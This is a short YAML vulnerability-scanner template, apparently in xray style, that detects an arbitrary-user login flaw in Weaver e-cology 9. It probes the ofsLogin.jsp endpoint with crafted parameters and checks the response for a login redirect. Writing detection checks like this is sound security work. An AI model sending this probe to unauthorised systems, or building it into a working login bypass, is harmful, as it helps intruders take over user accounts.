id: ecology-ofslogin-aul

info:
  name: 泛微 e-cology 任意用户登录漏洞
  author: Chaitin
  severity: high
  verified: false
  description: |
    泛微e-cology9中存在信息泄露及任意用户登录漏洞，远程攻击者可利用两个漏洞组合任意登录系统中的用户
  reference:
    - https://mp.weixin.qq.com/s/Rhk7DaiL_YgqzaRwahDmjw
  solutions: 泛微e-cology9
  tags: ecology
  created: 2023/06/28

rules:
  r0:
    request:
      method: GET
      path: /mobile/plugin/1/ofsLogin.jsp?syscode=syscode&timestamp=2&gopage=3&receiver=test&loginTokenFromThird=
    expression: |
      response.status == 200 &&
      response.body.bcontains(b"location.replace") && 
      response.body.bcontains(b"/login/Login.jsp") 
expression: r0()